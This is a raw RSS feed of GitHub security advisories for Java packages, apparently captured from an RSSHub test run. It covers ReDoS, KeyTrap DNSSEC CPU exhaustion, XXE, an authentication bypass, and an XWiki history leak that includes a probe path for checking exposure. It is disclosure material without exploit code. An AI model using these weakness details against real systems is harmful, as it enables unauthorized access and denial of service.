<li><a href="https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn">https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-g6hg-4v3c-6jq7">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:iotdb-server] Apache IoTDB subject to ReDOS with Java 8</title>
<description><p>Apache IoTDB versions 0.12.2 through 0.12.6, and 0.13.0 through 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. This issue is patched in 0.13.3. Users should upgrade or use a later version of Java to avoid it.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-43766">https://nvd.nist.gov/vuln/detail/CVE-2022-43766</a></li>
<li><a href="https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn">https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-g6hg-4v3c-6jq7">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:flink-tsfile-connector] Apache IoTDB subject to ReDOS with Java 8</title>
<description><p>Apache IoTDB versions 0.12.2 through 0.12.6, and 0.13.0 through 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. This issue is patched in 0.13.3. Users should upgrade or use a later version of Java to avoid it.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-43766">https://nvd.nist.gov/vuln/detail/CVE-2022-43766</a></li>
<li><a href="https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn">https://lists.apache.org/thread/9pgpb82p5brooy41n8l5q0y9h33db2zn</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2022-42972.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-g6hg-4v3c-6jq7">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g6hg-4v3c-6jq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.dolphinscheduler:dolphinscheduler-api] Incorrect Default Permissions in Apache DolphinScheduler</title>
<description><p>Versions of Apache DolphinScheduler prior to 1.3.2 allowed an ordinary user under any tenant to override another user's password through the API interface.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-13922">https://nvd.nist.gov/vuln/detail/CVE-2020-13922</a></li>
<li><a href="https://github.com/apache/incubator-dolphinscheduler/commit/b8a9e2e00f2f207ae60c913a7173b59405ff95f1">https://github.com/apache/incubator-dolphinscheduler/commit/b8a9e2e00f2f207ae60c913a7173b59405ff95f1</a></li>
<li><a href="https://www.mail-archive.com/announce@apache.org/msg06076.html">https://www.mail-archive.com/announce@apache.org/msg06076.html</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-dolphinscheduler/PYSEC-2021-876.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-dolphinscheduler/PYSEC-2021-876.yaml</a></li>
<li><a href="https://www.mail-archive.com/announce%40apache.org/msg06076.html">https://www.mail-archive.com/announce%40apache.org/msg06076.html</a></li>
<li><a href="https://github.com/advisories/GHSA-qhh5-9738-g9mx">https://github.com/advisories/GHSA-qhh5-9738-g9mx</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-qhh5-9738-g9mx</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-qhh5-9738-g9mx</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.apache.iotdb:iotdb-grafana-connector] Apache IoTDB Grafana Connector vulnerable to Improper Authentication</title>
<description><p>Improper Authentication vulnerability in Apache Software Foundation Apache IoTDB. This issue affects Apache IoTDB Grafana Connector from 0.13.0 through 0.13.3.</p>
<p>Attackers could log in without authorization. This is fixed in 0.13.4.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-24831">https://nvd.nist.gov/vuln/detail/CVE-2023-24831</a></li>
<li><a href="https://lists.apache.org/thread/3dgvzgstycf8b5hyf4z3n7cqdhcyln3l">https://lists.apache.org/thread/3dgvzgstycf8b5hyf4z3n7cqdhcyln3l</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2023-7.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/apache-iotdb/PYSEC-2023-7.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-pvjv-386f-c8wh">https://github.com/advisories/GHSA-pvjv-386f-c8wh</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pvjv-386f-c8wh</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pvjv-386f-c8wh</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.jitsi:dnssecjava] DNSJava affected by KeyTrap - NSEC3 closest encloser proof can exhaust CPU resources</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, using only a non-validating resolver will remove the vulnerability.</p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116">https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50868">https://nvd.nist.gov/vuln/detail/CVE-2023-50868</a></li>
<li><a href="https://github.com/advisories/GHSA-pv4h-p8jr-6cv2">https://github.com/advisories/GHSA-pv4h-p8jr-6cv2</a></li>
<li><a href="https://github.com/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mmwx-rj87-vfgr</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</guid>
<author>GitHub</author>
</item>
<item>
<title>[dnsjava:dnsjava] DNSJava affected by KeyTrap - NSEC3 closest encloser proof can exhaust CPU resources</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, using only a non-validating resolver will remove the vulnerability.</p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-mmwx-rj87-vfgr</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116">https://github.com/dnsjava/dnsjava/commit/711af79be3214f52daa5c846b95766dc0a075116</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50868">https://nvd.nist.gov/vuln/detail/CVE-2023-50868</a></li>
<li><a href="https://github.com/advisories/GHSA-pv4h-p8jr-6cv2">https://github.com/advisories/GHSA-pv4h-p8jr-6cv2</a></li>
<li><a href="https://github.com/advisories/GHSA-mmwx-rj87-vfgr">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-mmwx-rj87-vfgr</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-mmwx-rj87-vfgr</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.jitsi:dnssecjava] DNSJava vulnerable to KeyTrap - Denial-of-Service Algorithmic Complexity Attacks</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, using only a non-validating resolver will remove the vulnerability.</p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78">https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf">https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50387">https://nvd.nist.gov/vuln/detail/CVE-2023-50387</a></li>
<li><a href="https://github.com/advisories/GHSA-8459-gg55-8qjj">https://github.com/advisories/GHSA-8459-gg55-8qjj</a></li>
<li><a href="https://github.com/advisories/GHSA-crjg-w57m-rqqf">https://github.com/advisories/GHSA-crjg-w57m-rqqf</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-crjg-w57m-rqqf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-crjg-w57m-rqqf</guid>
<author>GitHub</author>
</item>
<item>
<title>[dnsjava:dnsjava] DNSJava vulnerable to KeyTrap - Denial-of-Service Algorithmic Complexity Attacks</title>
<description><h3 id="impact">Impact</h3>
<p>Users using the <code>ValidatingResolver</code> for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.</p>
<h3 id="patches">Patches</h3>
<p>Users should upgrade to dnsjava v3.6.0.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Although not recommended, using only a non-validating resolver will remove the vulnerability.</p>
<h3 id="references">References</h3>
<p><a href="https://www.athene-center.de/en/keytrap">https://www.athene-center.de/en/keytrap</a></p>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf">https://github.com/dnsjava/dnsjava/security/advisories/GHSA-crjg-w57m-rqqf</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78">https://github.com/dnsjava/dnsjava/commit/07ac36a11578cc1bce0cd8ddf2fe568f062aee78</a></li>
<li><a href="https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf">https://github.com/dnsjava/dnsjava/commit/3ddc45ce8cdb5c2274e10b7401416f497694e1cf</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50387">https://nvd.nist.gov/vuln/detail/CVE-2023-50387</a></li>
<li><a href="https://github.com/advisories/GHSA-8459-gg55-8qjj">https://github.com/advisories/GHSA-8459-gg55-8qjj</a></li>
<li><a href="https://github.com/advisories/GHSA-crjg-w57m-rqqf">https://github.com/advisories/GHSA-crjg-w57m-rqqf</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-crjg-w57m-rqqf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-crjg-w57m-rqqf</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.eclipse.edc:transfer-data-plane] Eclipse Dataspace Components's ConsumerPullTransferTokenValidationApiController doesn't check for token validit</title>
<description><p>In Eclipse Dataspace Components, from version 0.5.0 and before version 0.9.0, the ConsumerPullTransferTokenValidationApiController does not check for token validity (expiry, not-before, issuance date), which can allow an attacker to bypass the check for token expiration. The issue requires having a dataplane configured to support http proxy consumer pull AND including the module "transfer-data-plane". The affected code was marked deprecated from version 0.6.0 in favour of Dataplane Signaling. In 0.9.0 the vulnerable code has been removed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8642">https://nvd.nist.gov/vuln/detail/CVE-2024-8642</a></li>
<li><a href="https://github.com/eclipse-edc/Connector/commit/04899e91dcdb4a407db4eb7af3e7b6ff9a9e9ad6">https://github.com/eclipse-edc/Connector/commit/04899e91dcdb4a407db4eb7af3e7b6ff9a9e9ad6</a></li>
<li><a href="https://github.com/eclipse-edc/Connector/releases/tag/v0.9.0">https://github.com/eclipse-edc/Connector/releases/tag/v0.9.0</a></li>
<li><a href="https://gitlab.eclipse.org/security/cve-assignement/-/issues/28">https://gitlab.eclipse.org/security/cve-assignement/-/issues/28</a></li>
<li><a href="https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/234">https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/234</a></li>
<li><a href="https://github.com/eclipse-edc/Connector/blob/bcb2e42aee82ce1863be3dcbdab29919d39a0e97/extensions/control-plane/transfer/transfer-data-plane/src/main/java/org/eclipse/edc/connector/controlplane/transfer/dataplane/api/ConsumerPullTransferTokenValidationApiController.java">https://github.com/eclipse-edc/Connector/blob/bcb2e42aee82ce1863be3dcbdab29919d39a0e97/extensions/control-plane/transfer/transfer-data-plane/src/main/java/org/eclipse/edc/connector/controlplane/transfer/dataplane/api/ConsumerPullTransferTokenValidationApiController.java</a></li>
<li><a href="https://github.com/advisories/GHSA-8259-2x72-2gvc">https://github.com/advisories/GHSA-8259-2x72-2gvc</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8259-2x72-2gvc</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8259-2x72-2gvc</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.glassfish.main.web:web-core] Eclipse Glassfish URL redirection vulnerability</title>
<description><p>In Eclipse Glassfish versions prior to 7.0.10, a URL redirection vulnerability to untrusted sites existed.
This vulnerability is caused by the vulnerability (CVE-2023-41080) in the Apache code included in GlassFish.
This vulnerability only affects applications that are explicitly deployed to the root context ('/').</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8646">https://nvd.nist.gov/vuln/detail/CVE-2024-8646</a></li>
<li><a href="https://github.com/eclipse-ee4j/glassfish/pull/24655">https://github.com/eclipse-ee4j/glassfish/pull/24655</a></li>
<li><a href="https://gitlab.eclipse.org/security/cve-assignement/-/issues/34">https://gitlab.eclipse.org/security/cve-assignement/-/issues/34</a></li>
<li><a href="https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/163">https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/163</a></li>
<li><a href="https://glassfish.org/download">https://glassfish.org/download</a></li>
<li><a href="https://github.com/eclipse-ee4j/glassfish/commit/06b80012761d07f6e40e40aa6b0133465b0bd145">https://github.com/eclipse-ee4j/glassfish/commit/06b80012761d07f6e40e40aa6b0133465b0bd145</a></li>
<li><a href="https://github.com/advisories/GHSA-7gq2-vwq9-w8vw">https://github.com/advisories/GHSA-7gq2-vwq9-w8vw</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7gq2-vwq9-w8vw</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7gq2-vwq9-w8vw</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.keycloak:keycloak-core] Keycloak Denial of Service vulnerability</title>
<description><p>A denial of service vulnerability was found in Keycloak where the amount of attributes per object is not limited; an attacker, by sending repeated HTTP requests, could cause resource exhaustion when the application sends back rows with long attribute values.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-6841">https://nvd.nist.gov/vuln/detail/CVE-2023-6841</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2023-6841">https://access.redhat.com/security/cve/CVE-2023-6841</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2254714">https://bugzilla.redhat.com/show_bug.cgi?id=2254714</a></li>
<li><a href="https://github.com/advisories/GHSA-w97f-w3hq-36g2">https://github.com/advisories/GHSA-w97f-w3hq-36g2</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-w97f-w3hq-36g2</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-w97f-w3hq-36g2</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.eclipse.jetty:jetty-xml] Eclipse Jetty XmlParser allows arbitrary DOCTYPE declarations</title>
<description><h3 id="from-the-reporter">From the reporter</h3>
<blockquote>
<p><code>XmlParser</code> is vulnerable to XML external entity (XXE) vulnerability.
XmlParser is being used when parsing Jetty’s xml configuration files. An attacker might exploit
this vulnerability in order to achieve SSRF or cause a denial of service.
One possible scenario is importing a (remote) malicious WAR into a Jetty’s server, while the
WAR includes a malicious web.xml.</p>
</blockquote>
<h3 id="impact">Impact</h3>
<p>There are no circumstances in a normally deployed Jetty server where potentially hostile XML is given to the XmlParser class without the attacker already having arbitrary access to the server. I.e. in order to exploit <code>XmlParser</code> the attacker would already have the ability to deploy and execute hostile code. Specifically, Jetty has no protection against malicious web application and potentially hostile web applications should only be run on an isolated virtualisation. </p>
<p>Thus this is not considered a vulnerability of the Jetty server itself, as any such usage of the jetty XmlParser is equally vulnerable as a direct usage of the JVM supplied SAX parser. No CVE will be allocated to this advisory.</p>
<p>However, any direct usage of the <code>XmlParser</code> class by an application may be vulnerable. The impact would greatly depend on how the application uses <code>XmlParser</code>, but it could be a denial of service due to large entity expansion, or possibly the revealing of local files if the XML results are accessible remotely.</p>
<h3 id="patches">Patches</h3>
<p>The ability to configure the SAXParserFactory to fit the needs of your particular XML parser implementation has been merged as part of PR #10067.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Don't use <code>XmlParser</code> to parse data from users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/eclipse/jetty.project/security/advisories/GHSA-58qw-p7qm-5rvh">https://github.com/eclipse/jetty.project/security/advisories/GHSA-58qw-p7qm-5rvh</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/10067">https://github.com/eclipse/jetty.project/pull/10067</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-10.0.16">https://github.com/eclipse/jetty.project/releases/tag/jetty-10.0.16</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-11.0.16">https://github.com/eclipse/jetty.project/releases/tag/jetty-11.0.16</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-12.0.0">https://github.com/eclipse/jetty.project/releases/tag/jetty-12.0.0</a></li>
<li><a href="https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.52.v20230823">https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.52.v20230823</a></li>
<li><a href="https://github.com/advisories/GHSA-58qw-p7qm-5rvh">https://github.com/advisories/GHSA-58qw-p7qm-5rvh</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-58qw-p7qm-5rvh</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-58qw-p7qm-5rvh</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.eclipse.jetty:jetty-openid] Jetty's OpenId Revoked authentication allows one request</title>
<description><p>If a Jetty <code>OpenIdAuthenticator</code> uses the optional nested <code>LoginService</code>, and that <code>LoginService</code> decides to revoke an already authenticated user, then the current request will still treat the user as authenticated. The authentication is then cleared from the session and subsequent requests will not be treated as authenticated. </p>
<p>So a request on a previously authenticated session could be allowed to bypass authentication after it had been rejected by the <code>LoginService</code>.</p>
<h3 id="impact">Impact</h3>
<p>This impacts usages of jetty-openid which have configured a nested <code>LoginService</code> and where that <code>LoginService</code> is capable of rejecting previously authenticated users.</p>
<h3 id="original-report">Original Report</h3>
<blockquote>
<p>working on a custom OpenIdAuthenticator, I discovered the following:</p>
<p><a href="https://github.com/eclipse/jetty.project/blob/jetty-10.0.14/jetty-openid/src/main/java/org/eclipse/jetty/security/openid/OpenIdAuthenticator.java#L505">https://github.com/eclipse/jetty.project/blob/jetty-10.0.14/jetty-openid/src/main/java/org/eclipse/jetty/security/openid/OpenIdAuthenticator.java#L505</a></p>
<p>In the case where the LoginService does return that the authentication has been revoked (from the validate() call on line 463), the OpenIdAuthenticator removes the authentication from the session; however the current request still proceeds as if authenticated, since it falls through to "return authentication" on line 505.</p>
<p>This is fixed by moving the line 505 (and associated debug log) inside the else block that ends on line 502, instead of outside it. Then the revocation case will run through to line 517 and will trigger a new OpenId authentication which I think is correct.</p>
<p>I think this revocation can only occur if you do attach a separate LoginService to the OpenIdLoginService, but in that case the revoked authentication will still let the next request through (and possibly more than one if they are very close to simultaneous).</p>
<p>Technically I think this is a security vulnerability, if a very minor one, so I'm sending this off-list.</p>
</blockquote>
<h3 id="patched-versions">Patched Versions</h3>
<p>Fixed in Jetty Versions:</p>
<ul>
<li>9.4.52 - fixed in PR <a href="https://github.com/eclipse/jetty.project/pull/9660">https://github.com/eclipse/jetty.project/pull/9660</a></li>
<li>10.0.16 - fixed in PR <a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li>11.0.16 - fixed in PR <a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li>12.0.0 - not impacted (already has fix)</li>
</ul>
<h3 id="workaround">Workaround</h3>
<p>Upgrade your version of Jetty.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/9660">https://github.com/eclipse/jetty.project/pull/9660</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/eclipse/jetty.project/security/advisories/GHSA-pwh8-58vv-vw48">https://github.com/eclipse/jetty.project/security/advisories/GHSA-pwh8-58vv-vw48</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/9528">https://github.com/eclipse/jetty.project/pull/9528</a></li>
<li><a href="https://github.com/eclipse/jetty.project/pull/9660">https://github.com/eclipse/jetty.project/pull/9660</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-41900">https://nvd.nist.gov/vuln/detail/CVE-2023-41900</a></li>
<li><a href="https://www.debian.org/security/2023/dsa-5507">https://www.debian.org/security/2023/dsa-5507</a></li>
<li><a href="https://security.netapp.com/advisory/ntap-20231110-0004">https://security.netapp.com/advisory/ntap-20231110-0004</a></li>
<li><a href="https://github.com/advisories/GHSA-pwh8-58vv-vw48">https://github.com/advisories/GHSA-pwh8-58vv-vw48</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pwh8-58vv-vw48</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pwh8-58vv-vw48</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.xwiki.platform:xwiki-platform-rest-server] XWiki Platform document history including authors of any page exposed to unauthorized actors</title>
<description><h3 id="impact">Impact</h3>
<p>The REST API exposes the history of any page in XWiki of which the attacker knows the name. The exposed information includes for each modification of the page the time of the modification, the version number, the author of the modification (both username and displayed name) and the version comment. This information is exposed regardless of the rights setup, and even when the wiki is configured to be fully private.</p>
<p>On a private wiki, this can be tested by accessing <code>/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history</code>, if this shows the history of the main page then the installation is vulnerable.</p>
<h3 id="patches">Patches</h3>
<p>This has been patched in XWiki 15.10.9 and XWiki 16.3.0RC1.</p>
<h3 id="workarounds">Workarounds</h3>
<p>There aren't any known workarounds apart from upgrading to a fixed version.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f">https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45591">https://nvd.nist.gov/vuln/detail/CVE-2024-45591</a></li>
<li><a href="https://github.com/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pvmm-55r5-g3mm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</guid>
<author>GitHub</author>
</item>
<item>
<title>[org.xwiki.platform:xwiki-platform-rest-server] XWiki Platform document history including authors of any page exposed to unauthorized actors</title>
<description><h3 id="impact">Impact</h3>
<p>The REST API exposes the history of any page in XWiki of which the attacker knows the name. The exposed information includes for each modification of the page the time of the modification, the version number, the author of the modification (both username and displayed name) and the version comment. This information is exposed regardless of the rights setup, and even when the wiki is configured to be fully private.</p>
<p>On a private wiki, this can be tested by accessing <code>/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history</code>, if this shows the history of the main page then the installation is vulnerable.</p>
<h3 id="patches">Patches</h3>
<p>This has been patched in XWiki 15.10.9 and XWiki 16.3.0RC1.</p>
<h3 id="workarounds">Workarounds</h3>
<p>There aren't any known workarounds apart from upgrading to a fixed version.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f">https://github.com/xwiki/xwiki-platform/commit/26482ee5d29fc21f31134d1ee13db48716e89e0f</a></li>
<li><a href="https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8">https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8</a></li>
<li><a href="https://jira.xwiki.org/browse/XWIKI-22052">https://jira.xwiki.org/browse/XWIKI-22052</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45591">https://nvd.nist.gov/vuln/detail/CVE-2024-45591</a></li>
<li><a href="https://github.com/advisories/GHSA-pvmm-55r5-g3mm">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pvmm-55r5-g3mm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pvmm-55r5-g3mm</guid>
<author>GitHub</author>
</item>
</channel>
</rss> ...
http://localhost:1200/github-advisor/data/npm - Success ✔️
<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - npm</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/npm" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - npm - Powered by RSSHub</description>
<generator>RSSHub</generator>
